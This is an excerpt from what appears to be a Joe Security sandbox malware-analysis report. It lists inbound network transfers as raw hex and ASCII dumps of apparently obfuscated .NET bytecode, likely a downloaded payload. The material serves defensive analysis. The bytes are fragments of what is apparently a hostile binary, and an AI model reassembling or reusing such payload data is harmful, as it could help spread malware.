2022-02-22 14:30:32 UTC 6 IN Data Raw: 00 38 d5 00 00 00 38 7c 00 00 00 38 77 00 00 00 20 06 00 00 00 fe 0c 01 00 3f 3e 00 00 00 20 06 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 60 01 00 00 20 05 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 05 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 27 01 00 00 38 30 00 00 00 38 2b 00 00 00 20 07 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 07 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 5b 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 a1 fe ff ff fe 0c 05 00 fe 0c 0c 00 7e 0b 00 00 04 fe 0c 0b 00 fe 0c 03 00 58 4a 97 29 09 00 00 11 a2 fe 0c 02 00 fe 0c 0c 00 20 05 00 00 00 9c fe 0c 0c 00 20 01 00 00 00 58 fe 0e 0c 00 fe 0c 0b 00 20 08 00 00 00 58 fe 0e 0b 00 38 54 fe ff ff fe 0c 02 00 fe 0c 0c 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 0c 00 20 01 00 00 00 59 fe 0c Data Ascii: 88|8w ?> =8` ? =8'808+ ? =8[888~XJ) X X8T Y Y
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 38 of 65
2022-02-22 14:30:32 UTC 8 IN Data Raw: 0b 00 38 57 fd ff ff fe 0c 0b 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0f 00 5a 58 fe 0e 0b 00 38 28 fd ff ff 00 fe 0c 05 00 fe 0c 0c 00 20 01 00 00 00 59 9a 2a 00 00 13 30 06 00 7a 03 00 00 10 00 00 11 fe 0d 01 00 25 20 01 00 00 00 54 46 fe 0e 0f 00 fe 0c 0f 00 20 04 00 00 00 5a fe 0e 02 00 fe 0c 0f 00 20 08 00 00 00 5a fe 0e 06 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 04 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0e 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 07 00 fe 0e 03 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 09 00 7f 50 00 00 04 fe 0e 08 00 fe 0c 08 00 fe 0e 0b 00 fe 0c 0b 00 fe 0e 00 00 00 fe 0c 0a 00 20 01 00 00 00 3b ca 02 00 00 fe 0c 0b 00 fe 0e 00 00 fe 0c 0b Data Ascii: 8W((%~a Y ZX8( Y*0z% TF Z Z % P ;
2022-02-22 14:30:32 UTC 9 IN Data Raw: 00 00 00 00 20 02 00 00 00 8d 06 00 00 01 80 0d 00 00 04 7e 0d 00 00 04 20 00 00 00 00 fe 06 20 00 00 06 9b 7e 0d 00 00 04 20 01 00 00 00 fe 06 21 00 00 06 9b 2a 00 00 13 30 06 00 d9 04 00 00 12 00 00 11 fe 0d 0c 00 25 20 01 00 00 00 54 46 fe 0e 00 00 fe 0c 00 00 20 04 00 00 00 5a fe 0e 02 00 fe 0c 00 00 20 08 00 00 00 5a fe 0e 01 00 20 02 00 00 00 8d 01 00 00 01 fe 0e 03 00 20 02 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 02 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 12 00 00 01 25 fe 0e 05 00 fe 0e 0f 00 20 02 00 00 00 8d 04 00 00 01 25 fe 0e 0d 00 fe 0e 04 00 20 02 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 01 00 a2 fe 0c 08 00 20 01 00 00 00 fe 09 00 00 a2 7f 51 00 00 04 fe 0e 06 00 fe 0c 06 00 fe 0e 11 00 fe 0c 11 00 Data Ascii: ~ ~ !*0% TF Z Z % % Q
2022-02-22 14:30:32 UTC 10 IN Data Raw: 01 00 00 00 8d 01 00 00 01 fe 0e 03 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 03 00 00 01 25 fe 0e 05 00 fe 0e 0f 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 0d 00 fe 0e 04 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 00 00 a2 7f 52 00 00 04 fe 0e 06 00 fe 0c 06 00 fe 0e 11 00 fe 0c 11 00 fe 0e 10 00 00 fe 0c 0a 00 20 01 00 00 00 3b ea 02 00 00 fe 0c 11 00 fe 0e 10 00 fe 0c 11 00 46 fe 0e 0e 00 fe 0c 11 00 20 01 00 00 00 58 fe 0e 11 00 fe 0c 0e 00 20 01 00 00 00 3f 1d 01 00 00 fe 0c 0e 00 20 07 00 00 00 3d 0f 01 00 00 20 04 00 00 00 fe 0c 0e 00 3f 8a 00 00 00 20 04 00 00 00 fe 0c 0e 00 3d 05 00 00 00 38 a1 01 00 00 20 02 00 00 00 fe 0c 0e 00 3f 3e 00 00 00 20 02 Data Ascii: % % R ;F X ? = ? =8 ?>
2022-02-22 14:30:32 UTC 12 IN Data Raw: 00 00 00 38 2b 00 00 00 20 07 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 07 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 42 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 a1 fe ff ff fe 0c 05 00 fe 0c 09 00 d0 05 00 00 02 8c 13 00 00 01 a2 fe 0c 0d 00 fe 0c 09 00 20 04 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 38 6d fe ff ff fe 0c 0d 00 fe 0c 09 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 9a a5 13 00 00 01 7e 10 00 00 04 fe 0c 0c 00 fe 0c 02 00 58 4a 97 29 18 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 0e fe ff ff fe 0c 08 00 fe 0c 0c 00 fe 0c 02 00 58 4a fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 09 00 20 01 Data Ascii: 8+ ? =8B888 X8m Y Y Y~XJ) X8XJ Y X
2022-02-22 14:30:32 UTC 13 IN Data Raw: 01 00 fe 0c 01 00 39 13 00 00 00 28 01 00 00 2b fe 0e 00 00 38 14 00 00 00 38 0e 00 00 00 00 fe 09 00 00 fe 0e 00 00 38 01 00 00 00 00 fe 0c 00 00 2a 00 00 00 13 30 02 00 1a 00 00 00 1c 00 00 11 00 fe 09 01 00 fe 0d 00 00 fe 15 05 00 00 1b fe 0c 00 00 81 05 00 00 1b 00 2a 00 00 13 30 05 00 4e 02 00 00 1d 00 00 11 fe 0d 0f 00 25 20 01 00 00 00 54 46 fe 0e 03 00 fe 0c 03 00 20 04 00 00 00 5a fe 0e 0b 00 fe 0c 03 00 20 08 00 00 00 5a fe 0e 05 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 01 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0d 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 06 00 fe 0e 0e 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 02 00 fe 0c 02 00 20 00 00 00 00 fe 09 00 00 a2 7f 55 00 00 04 fe 0e 09 00 fe 0c 09 00 fe 0e 04 00 Data Ascii: 9(+888*0*0N% TF Z Z % U
2022-02-22 14:30:32 UTC 14 IN Data Raw: 00 fe 0c 0b 00 fe 0e 01 00 fe 0c 0b 00 46 fe 0e 09 00 fe 0c 0b 00 20 01 00 00 00 58 fe 0e 0b 00 fe 0c 09 00 20 01 00 00 00 3f ab 00 00 00 fe 0c 09 00 20 04 00 00 00 3d 9d 00 00 00 20 02 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 83 00 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 5c 00 00 00 38 56 00 00 00 38 51 00 00 00 20 03 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 7e 00 00 00 38 2b 00 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 13 ff ff ff fe 0c 06 00 fe 0c 0c 00 fe 0c 0e 00 fe 0c 0b 00 fe 0c 00 00 58 4a 9a a2 fe 0c 08 00 fe 0c 0c Data Ascii: F X ? = ?> =8 ? =8\8V8Q ? =8~8+ ? =8888XJ
2022-02-22 14:30:32 UTC 16 IN Data Raw: 00 3f 18 00 00 00 20 10 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 51 0d 00 00 38 65 01 00 00 38 60 01 00 00 20 13 00 00 00 fe 0c 27 00 3f 3e 00 00 00 20 13 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 23 0e 00 00 20 12 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a1 0d 00 00 38 19 01 00 00 38 14 01 00 00 20 14 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 14 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 1f 0e 00 00 38 ee 00 00 00 38 e9 00 00 00 20 18 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 18 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 df 16 00 00 20 16 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 16 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a0 0e 00 00 38 a2 00 00 00 20 17 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 17 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 c4 Data Ascii: ? '=8Q8e8` '?> '=8# '? '=888 '? '=888 '?d '=8 '? '=88 '? '=8
2022-02-22 14:30:32 UTC 17 IN Data Raw: 0c 0a 00 fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a 9a a2 fe 0c 15 00 fe 0c 0a 00 20 05 00 00 00 9c fe 0c 0a 00 20 01 00 00 00 58 fe 0e 0a 00 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 98 f7 ff ff fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a 74 09 00 00 1b 7e 15 00 00 04 fe 0c 21 00 fe 0c 18 00 58 4a 97 29 22 00 00 11 a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 39 f7 ff ff fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0e 0a 00 dd fa f6 ff ff fe 0c 19 00 fe 0c 21 00 fe 0c 18 00 58 4a 58 fe 0e 21 00 dd e2 f6 ff ff fe 0c 15 00 fe 0c 0a Data Ascii: !XJ X! X! Y Y Yt~!XJ)"! X!9!XJ Y! X! Y!XJX!
2022-02-22 14:30:32 UTC 18 IN Data Raw: fe 0c 13 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 24 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 fe 0c 26 00 fe 0c 24 00 fe 0c 1f 00 58 3c 16 00 00 00 fe 0c 24 00 fe 0c 26 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 23 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 13 00 38 5b ff ff ff 00 fe 0e 25 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 0e 00 fe 0c 0e 00 fe 0c 1d 00 3b bd 00 00 00 fe 0c 19 00 fe 0c 1d 00 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 0e 00 fe 0c 0e 00 20 ff ff ff ff 3b 78 00 00 00 Data Ascii: X [ XX ZXXJ$ XX ZX XXJ&$X<$&=8& X#8n Y8[% XX% ZX XXJ;X XXJ ;x
2022-02-22 14:30:32 UTC 20 IN Data Raw: 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 00 00 00 00 9c fe 0c 12 00 fe 0c 0a 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 39 f1 ff ff 00 fe 0c 11 00 fe 0c 19 00 59 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 00 fe 0c 23 00 58 3c 16 00 00 00 fe 0c 13 00 fe 0c 0b 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 1f 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 24 Data Ascii: Y @0 T9Y $$X [ XX ZXXJ XX ZX XXJ##X<=8& X8n Y$
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 39 of 65
2022-02-22 14:30:32 UTC 21 IN Data Raw: 13 00 38 5b ff ff ff 00 fe 0e 26 00 fe 0c 19 00 20 a0 01 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0c 17 00 fe 0c 14 00 94 40 e8 fe ff ff fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 00 fe 0c 1d 00 fe 0e 05 00 00 fe 0c 05 00 20 ff ff ff ff 3b b4 01 00 00 00 fe 0c 0e 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 00 fe 0c 23 00 58 3c 16 00 00 00 fe 0c 13 00 fe 0c 0b 00 3d 1c 00 00 00 fe 0c 0d 00 38 Data Ascii: 8[& X& ZX XXJ@ X ; $$X [ XX ZXXJ XX ZX XXJ##X<=8
2022-02-22 14:30:32 UTC 22 IN Data Raw: 00 fe 0c 0e 00 20 01 00 00 00 3b b0 00 00 00 fe 0c 0e 00 20 02 00 00 00 3b 45 01 00 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c 14 00 fe 0c 16 00 9e fe 0c 06 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 Data Ascii: ; ;EX XXJ Y YX XXJX!" X8.X XXJ Y
2022-02-22 14:30:32 UTC 24 IN Data Raw: 0c 27 00 3f d6 00 00 00 20 13 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 97 0e 00 00 20 10 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 10 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a6 09 00 00 20 0e 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 0e 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 b8 08 00 00 38 65 01 00 00 20 0f 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 ee 08 00 00 38 3f 01 00 00 38 3a 01 00 00 20 11 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 11 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 78 0d 00 00 38 14 01 00 00 20 12 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 7d 0d 00 00 38 ee 00 00 00 38 e9 00 00 00 20 16 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 16 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 c8 0e 00 00 Data Ascii: '? '=8 '?d '=8 '? '=88e '? '=88?8: '? '=8x8 '? '=8}88 '?d '=8
2022-02-22 14:30:32 UTC 25 IN Data Raw: 00 9e fe 0c 06 00 fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 0f 00 fe 0c 20 00 7a 00 00 dd 31 f8 ff ff 00 dd 2b f8 ff ff fe 0c 10 00 fe 0c 0a 00 fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a 9a a2 fe 0c 15 00 fe 0c 0a 00 20 05 00 00 00 9c fe 0c 0a 00 20 01 00 00 00 58 fe 0e 0a 00 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd e4 f7 ff ff fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a 74 09 00 00 1b 7e 16 00 00 04 fe 0c 21 00 fe 0c 18 00 58 4a 97 29 22 00 00 11 a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 85 f7 ff ff fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a fe 0c 10 00 fe 0c 0a 00 20 01 00 00 Data Ascii: X8 z1+!XJ X! X! Y Y Yt~!XJ)"! X!!XJ
2022-02-22 14:30:32 UTC 26 IN Data Raw: 00 20 01 00 00 00 59 fe 0e 24 00 38 5b ff ff ff 00 fe 0e 1d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 1d 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0e 05 00 20 ff ff ff ff fe 0c 07 00 3b 1e 03 00 00 fe 0c 11 00 fe 0c 07 00 3b ff 02 00 00 fe 0c 07 00 fe 0c 19 00 59 fe 0e 16 00 00 fe 0c 14 00 20 00 00 00 00 3b 17 01 00 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 16 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 Data Ascii: Y$8[ ?X ZX XXJ ;;Y ; Y $$X [ X ZXXJ X ZX XXJ#
2022-02-22 14:30:32 UTC 28 IN Data Raw: 00 dd b2 ed ff ff 20 00 00 00 00 fe 0e 0a 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 22 00 fe 0c 14 00 9a fe 0e 20 00 fe 0c 20 00 14 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 06 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 00 00 00 00 9c fe 0c 12 00 fe 0c 0a 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 32 f1 ff ff 00 fe 0c 11 00 fe 0c 19 00 59 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe Data Ascii: Y" ;O ;I Y @0 T2Y $$X [ ?X ZXXJ ?X ZX XXJ
2022-02-22 14:30:32 UTC 29 IN Data Raw: fe 0e 1f 00 fe 0c 25 00 fe 0c 24 00 fe 0c 1f 00 58 3c 16 00 00 00 fe 0c 24 00 fe 0c 25 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 23 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 13 00 38 5b ff ff ff 00 fe 0e 26 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0c 17 00 fe 0c 14 00 94 40 e8 fe ff ff fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 00 fe 0c 1d 00 fe 0e 05 00 00 fe 0c 05 00 20 ff ff ff ff 3b b4 01 00 00 00 fe 0c 0e 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 005a 58 fe 0c 18 00 58 4a fe 0e Data Ascii: %$X<$%=8& X#8n Y8[& X& ZX XXJ@ X ; $$X [ ?X ZXXJ
2022-02-22 14:30:32 UTC 30 IN Data Raw: fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c 14 00 fe 0c 16 00 9e fe 0c 06 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c Data Ascii: Y YX XXJX!" X8.X XXJ Y YX XXJX!"
2022-02-22 14:30:32 UTC 32 IN Data Raw: 08 00 00 38 2d 03 00 00 38 28 03 00 00 20 0b 00 00 00 fe 0c 17 00 3f 8a 00 00 00 20 0b 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 48 09 00 00 20 09 00 00 00 fe 0c 17 00 3f 3e 00 00 00 20 09 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 99 08 00 00 20 08 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 08 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 39 08 00 00 38 c0 02 00 00 38 bb 02 00 00 20 0a 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 0a 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 94 08 00 00 38 95 02 00 00 38 90 02 00 00 20 0d 00 00 00 fe 0c 17 00 3f 3e 00 00 00 20 0d 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 90 09 00 00 20 0c 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 0c 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 10 09 00 00 38 49 02 00 00 38 44 02 00 00 20 0e 00 00 00 fe 0c 17 00 3f 18 00 00 00 Data Ascii: 8-8( ? =8H ?> =8 ? =8988 ? =888 ?> =8 ? =88I8D ?
2022-02-22 14:30:32 UTC 33 IN Data Raw: 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 20 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 20 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a fe 0e 18 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 20 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 20 00 9e fe 0c 27 00 fe 0c 14 00 20 01 00 Data Ascii: Y X XXJX ' X8. X XXJ Y Y X XXJX '
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 40 of 65
2022-02-22 14:30:32 UTC 34 IN Data Raw: 0c 08 00 fe 0c 00 00 59 fe 0e 0e 00 20 00 00 00 00 fe 0e 20 00 20 02 00 00 00 fe 0e 18 00 fe 0c 20 00 fe 0c 18 00 58 20 02 00 00 00 5b fe 0e 25 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 fe 0c 16 00 58 4a fe 0e 22 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 fe 0c 0e 00 fe 0c 22 00 fe 0c 1a 00 58 3c 16 00 00 00 fe 0c 22 00 fe 0c 0e 00 3d 1c 00 00 00 fe 0c 25 00 38 26 00 00 00 fe 0c 25 00 20 01 00 00 00 58 fe 0e 20 00 38 6e ff ff ff fe 0c 25 00 20 01 00 00 00 59 fe 0e 18 00 38 5b ff ff ff 00 fe 0e 12 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 12 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 fe 0e 19 00 20 ff ff ff ff fe 0c 04 00 3b Data Ascii: Y X [% jX% ZXXJ" jX% ZX XXJ"X<"=%8&% X 8n% Y8[ jX ZX XXJ ;
